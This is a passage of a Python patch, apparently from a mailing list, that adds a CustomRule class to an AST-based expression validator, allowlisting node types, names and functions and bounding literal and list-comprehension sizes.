    for node_type, check_func in self.custom_checks().items():
      if isinstance(node, node_type) and not check_func(node):
        return False
    for child in ast.iter_child_nodes(node):
      if not self.is_safe_node(child):
        return False
    return True
+
class CustomRule(RuleTemplate):
  """
  A custom rule implementation that allows specific constructs and provides
  custom checks for list comprehensions and container sizes.
  """

  # Upper bound on the number of elements a list comprehension may produce.
  MAX_COMPREHENSION_ELEMENTS = 10

  # Resolved by name: Python 2.7 has Num/Str but no Constant, and Python 3.8+
  # parses every literal as Constant. Missing names are skipped.
  _ALLOWED_NODE_TYPE_NAMES = (
    'List', 'Dict', 'ListComp', 'comprehension',
    'Compare', 'BinOp', 'BoolOp', 'And', 'Or',
    'Eq', 'Gt', 'Lt', 'Mod',
    'Name', 'Load', 'Store', 'Call', 'Constant', 'Num', 'Str',
  )

  def allowed_names(self):
    """Return a set of allowed variable names ('x' is the comprehension variable)."""
    return {'custom_var', 'another_var', 'x'}

  def allowed_functions(self):
    """Return a set of allowed function names ('range' feeds list comprehensions)."""
    return {'safe_function', 'range'}

  def allowed_node_types(self):
    """Return the AST node classes from _ALLOWED_NODE_TYPE_NAMES available in this interpreter."""
    return set(getattr(ast, name) for name in self._ALLOWED_NODE_TYPE_NAMES
               if hasattr(ast, name))

  def custom_checks(self):
    """Limit list literals to 10 elements, dict literals to 5 keys, and bound comprehensions."""
    return {
      ast.List: lambda node: len(node.elts) <= 10,
      ast.Dict: lambda node: len(node.keys) <= 5,
      ast.ListComp: self._check_list_comp
    }

  def _check_list_comp(self, node):
    """
    Accept a list comprehension only if it provably yields at most
    MAX_COMPREHENSION_ELEMENTS elements.

    Every generator must iterate over range() with integer-literal arguments;
    the bound is the product of the range lengths (filters can only shrink it).
    """
    total = 1
    for generator in node.generators:
      size = self._range_length(generator.iter)
      if size is None:
        return False  # If we can't determine the size, consider it unsafe
      total *= size
    return total <= self.MAX_COMPREHENSION_ELEMENTS

  def _range_length(self, node):
    """Return len(range(...)) for a range() call with 1-3 int-literal args, else None."""
    if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
            and node.func.id == 'range'):
      return None
    # Keyword, *args or **kwargs arguments make the length unknowable statically.
    if (getattr(node, 'keywords', None) or getattr(node, 'starargs', None)
        or getattr(node, 'kwargs', None) or not 1 <= len(node.args) <= 3):
      return None
    values = [self._int_literal(arg) for arg in node.args]
    if any(value is None for value in values):
      return None

    if len(values) == 1:
      start, stop, step = 0, values[0], 1
    elif len(values) == 2:
      start, stop = values
      step = 1
    else:
      start, stop, step = values

    if step == 0:
      return None  # range() itself would raise ValueError
    if step > 0:
      return max(0, (stop - start + step - 1) // step)
    return max(0, (start - stop - step - 1) // -step)

  @staticmethod
  def _int_literal(node):
    """Return the value of an integer literal node, or None for anything else."""
    constant_type = getattr(ast, 'Constant', None)
    if constant_type is not None and isinstance(node, constant_type):
      value = node.value
    else:
      value = getattr(node, 'n', None)  # ast.Num on Python 2 and Python 3 < 3.8
    if isinstance(value, bool) or not isinstance(value, int):
      return None
    return value
+
+
+
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]